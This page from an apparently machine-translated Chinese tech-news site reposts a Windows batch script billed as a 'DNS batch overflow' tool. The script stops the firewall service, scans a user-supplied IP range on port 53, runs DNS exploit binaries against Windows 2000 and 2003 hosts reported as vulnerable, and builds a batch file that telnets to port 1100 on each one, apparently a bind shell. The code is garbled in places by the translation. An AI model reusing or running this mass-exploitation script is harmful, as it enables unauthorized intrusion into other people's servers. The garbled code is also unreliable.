In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/03 Report--
This article mainly introduces the example analysis of DNS batch overflow, which is very detailed and has certain reference value. Friends who are interested must finish it!
The code is as follows:
@ shift 1
@ setlocal
@ cls
@ color A
@ title DNS batch overflow personal version
@ echo =
@ echo DNS batch overflow personal version
@ echo BY Amxking
@ echo 1. Enter the format of the IP segment you want to overflow: XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX
@ echo====
@ set / p input=1. Enter the IP segment that you want to overflow:
@ echo input% > > ip.txt
@ net stop sharedaccess
@ net start server
@ echo =
@ set / p c = Please select the scanning method: (1: TCP,2 is syn):
@ if "% c%" = = "2" goto syn
@ if "% c%" = = "1" goto tcp
: syn
@ for / f "eol= tokens=1,2 delims="% I in (ip.txt) do% MYFILES%\ s syn% I% j 53 / save
@ goto ip
: tcp
@ for / f "eol= tokens=1,2 delims="% I in (ip.txt) do% MYFILES%\ s tcp% I% j 53 1000 / save
@ goto ip
: ip
@ for / f "eol=- tokens=1 delims=" I in (result.txt) do echo I > > s1.txt
@ for / f "eol=P tokens=1 delims=" I in (s1.txt) do echo I > > s2.txt
@ for / f "eol=S tokens=1 delims=" I in (s2.txt) do echo I > > s.txt
@ del ip.txt
@ del s1.txt
@ del s2.txt
@ del Result.txt
@ echo====
@ echo waiting for overflow. When something like 203.80.19.6 1077: Vulnerability OS:window 2003 occurs
@ echo is IP 203.80.19.6 that can be overflowed, IP 1077 is port 2003, and system type
@ echo Please save those that can overflow in boot.txt format: IP port system such as 58.34.125.200 1029 2003
@ echo====
@ FOR / F "eol= tokens=1 delims=" I in (s.txt) do MYFILES%\ dns-s I > > a.txt
@ echo====
@ echo Please save those that can overflow in boot.txt format: IP port system such as 58.34.125.200 1029 2003
@ echo====
@ pause
For / F "eol= tokens=1,2 delims="% I in (boot.txt) do% MYFILES%\ dns-t2000all% I% j
For / F "eol= tokens=1,2 delims="% I in (boot.txt) do% MYFILES%\ dns-t2003eng% I% j
@ goto yichu
: yichu
@ for / F "eol=s tokens=1 delims=" I in (boot.txt) do echo telnet I 1100 > > 3.txt
@ for / F "eol= tokens=1 delims=" I in (3.txt) do echo I > > i.bat
@ del s.txt
@ del a.txt
@ del 3.txt
@ echo====
@ echo runs the generated batch waiting for an overflow.
@ echo====
@ pause
The above is all the contents of the article "sample Analysis of DNS batch spillovers". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.